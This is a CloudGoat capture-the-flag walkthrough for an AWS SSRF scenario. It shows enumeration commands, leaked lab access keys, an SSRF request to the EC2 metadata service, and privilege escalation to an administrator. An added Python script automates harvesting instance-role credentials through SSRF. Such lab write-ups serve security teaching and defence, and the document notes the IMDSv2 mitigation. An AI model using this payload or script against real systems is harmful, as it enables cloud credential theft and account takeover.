Cloudgoat AWS CTF solution- Scenario 6 (ec2_ssrf)
Scenario: ec2_ssrf
Deployment:
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py create ec2_ssrf
Add the access keys that CloudGoat prints at the end of the deployment to the "~/.aws/credentials" file (here "/root/.aws/credentials") under the profile name "solus".
Scenario Resources
- 1 VPC with:
- EC2 x 1
- 1 Lambda Function
- 1 S3 Bucket
Scenario Start(s)
- IAM User “Solus”
Scenario Goal(s)
Invoke the “cg-lambda-[ CloudGoat ID ]” Lambda function.
Summary
Starting as the IAM user Solus, the attacker discovers they have ReadOnly permissions to a Lambda function, where hardcoded secrets lead them to an EC2 instance running a web application that is vulnerable to server-side request forgery (SSRF). After exploiting the vulnerable app and acquiring keys from the EC2 metadata service, the attacker gains access to a private S3 bucket with a set of keys that allow them to invoke the Lambda function and complete the scenario.
Exploitation Route(s)
Route Walkthrough — IAM User “Solus”
ec2 public IP: 54.198.199.238
1. As the IAM user Solus, the attacker explores the AWS environment and discovers they can list Lambda functions in the account.
2. Listing Lambda functions:
aws lambda list-functions --profile solus
The output shows the function "arn:aws:lambda:us-east-1:864154101007:function:cg-lambda-ec2_ssrf_cgiddzghpaob13" running with the role "arn:aws:iam::864154101007:role/cg-lambda-role-ec2_ssrf_cgiddzghpaob13-service-role". The same list-functions output includes each function's configuration, including its environment variables.
3. The function configuration carries two environment variables holding hardcoded AWS keys:
"EC2_ACCESS_KEY_ID": "AKIA4SM4ZEUHQLXA376S",
"EC2_SECRET_KEY_ID": "HY/SFYuq8YOC1iFS3vSHv/+jvkEvF1pIUyta31Ga"
4. Within the Lambda function's environment, the attacker thus finds AWS access keys belonging to a different user, the IAM user Wrex.
5. Save these keys as a new profile (the walkthrough names it "ec2_env_var") and, now operating as Wrex, enumerate that user's permissions.
6. The attacker discovers an EC2 instance running a web application with an SSRF vulnerability.
a) Finding running EC2 instances (the instance's public IP is 54.242.29.73):
aws ec2 describe-instances --region us-east-1 --profile ec2_env_var
b) Finding TCP ports on the instance that are reachable from the internet:
nmap -Pn --disable-arp-ping -vv -sS -p- -T5 54.242.29.73
c) Content discovery and parameter fuzzing on the web application turn up a valid GET parameter named "url".
7. Exploiting the SSRF vulnerability via the ?url=... parameter, the attacker reads AWS keys from the EC2 instance metadata service (IMDS). Requesting the security-credentials path without a role name lists the role attached to the instance; appending that role name returns a JSON document with an AccessKeyId, a SecretAccessKey and a session Token, and all three are needed to use the credentials (the AWS CLI wants them as aws_access_key_id, aws_secret_access_key and aws_session_token). This works because the instance still allows IMDSv1; with IMDSv2 enforced, every metadata read must carry a session token obtained with a PUT request and a custom header, which a GET-only SSRF like this one cannot supply.
http://54.242.29.73/?url=169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-ec2_ssrf_cgiddzghpaob13
8. Using the keys from the EC2 instance, the attacker finds a private S3 bucket containing another set of AWS credentials for a more powerful user: Shepard.
a) Enumerating the permissions of the credentials obtained via SSRF (stored here under the profile "ec2_role").
b) Finding S3 buckets and listing their contents:
aws s3 ls --profile ec2_role
aws s3 ls s3://cg-secret-s3-bucket-ec2-ssrf-cgiddzghpaob13 --profile ec2_role
c) Testing the new credentials (stored here under the profile "admin-user").
9. Now operating as Shepard, who has full administrator privileges, the attacker invokes the original Lambda function to complete the scenario:
aws lambda invoke --function-name cg-lambda-ec2_ssrf_cgiddzghpaob13 output.txt --region us-east-1 --profile admin-user
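The SSRF step (7) above is done by hand with one browser request and a copy-paste of the returned JSON. The script below is an added example, not part of the CloudGoat scenario or of this walkthrough: it automates the same metadata walk (list the attached role, fetch its credentials, render a credentials-file profile) and refuses to emit a profile when the response is not a successful credential document, which is what you see when IMDSv2 is enforced. The target host, the "url" parameter name and the "ec2_role" profile name are taken from the walkthrough; the module name, function names and the sample IMDS response are assumptions made for the example.

```python
"""imds_ssrf.py: harvest instance-role credentials through a GET-based SSRF.

Added example for the ec2_ssrf walkthrough, not code from CloudGoat.
Usage (assumed, not from the page):
    python3 imds_ssrf.py 54.242.29.73 >> ~/.aws/credentials
Running it with no arguments parses the constructed sample below instead.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# Same path the walkthrough uses, scheme-less because that is what the
# vulnerable app accepted in the walkthrough.
IMDS_CREDS = "169.254.169.254/latest/meta-data/iam/security-credentials/"

# Constructed sample of an IMDSv1 credential document (fake values).
SAMPLE_IMDS_RESPONSE = json.dumps({
    "Code": "Success",
    "LastUpdated": "2021-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEKEYID0000",
    "SecretAccessKey": "exampleSecretKeyNotReal0000000000000000",
    "Token": "exampleSessionTokenNotReal",
    "Expiration": "2021-01-01T06:00:00Z",
})


def ssrf_url(target: str, inner: str, param: str = "url") -> str:
    """Build the request that makes the app fetch `inner` on our behalf."""
    return f"http://{target}/?{urllib.parse.urlencode({param: inner})}"


def fetch(target: str, inner: str, timeout: float = 10.0) -> str:
    """Fetch `inner` through the SSRF and return the body as text."""
    try:
        with urllib.request.urlopen(ssrf_url(target, inner), timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as exc:
        # 401 here usually means IMDSv2 is required (no token on a GET).
        raise RuntimeError(f"SSRF fetch of {inner!r} failed: HTTP {exc.code}") from exc


def role_name(listing: str) -> str:
    """The credentials path with no role appended lists the attached role."""
    names = [line.strip() for line in listing.splitlines() if line.strip()]
    if not names:
        raise ValueError("no IAM role attached to this instance")
    return names[0]


def parse_credentials(body: str) -> dict:
    """Turn the IMDS JSON into CLI-style keys; reject non-credential bodies."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        raise ValueError("not a credential document (IMDSv2 enforced or wrong role?)") from exc
    if doc.get("Code") != "Success":
        raise ValueError(f"IMDS returned Code={doc.get('Code')!r}")
    return {
        "aws_access_key_id": doc["AccessKeyId"],
        "aws_secret_access_key": doc["SecretAccessKey"],
        # Temporary credentials are rejected without the session token.
        "aws_session_token": doc["Token"],
        "expiration": doc["Expiration"],
    }


def profile_block(creds: dict, profile: str = "ec2_role") -> str:
    """Render a ~/.aws/credentials stanza, session token included."""
    return (
        f"[{profile}]\n"
        f"aws_access_key_id = {creds['aws_access_key_id']}\n"
        f"aws_secret_access_key = {creds['aws_secret_access_key']}\n"
        f"aws_session_token = {creds['aws_session_token']}\n"
        f"# expires {creds['expiration']}\n"
    )


def harvest(target: str, profile: str = "ec2_role") -> str:
    """Full chain: list role, fetch its credentials, return a profile block."""
    role = role_name(fetch(target, IMDS_CREDS))
    creds = parse_credentials(fetch(target, IMDS_CREDS + role))
    return profile_block(creds, profile)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.stdout.write(harvest(sys.argv[1]))
    else:
        sys.stdout.write(profile_block(parse_credentials(SAMPLE_IMDS_RESPONSE)))
```

The credentials are short-lived (see the Expiration field), so re-run the harvest rather than reusing an old profile once it expires. On the defensive side, the whole chain stops at step 7 if the instance requires IMDSv2 (the --http-tokens required setting of aws ec2 modify-instance-metadata-options), because the app only issues plain GET requests on the attacker's behalf.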
References:
https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/ec2_ssrf/README.md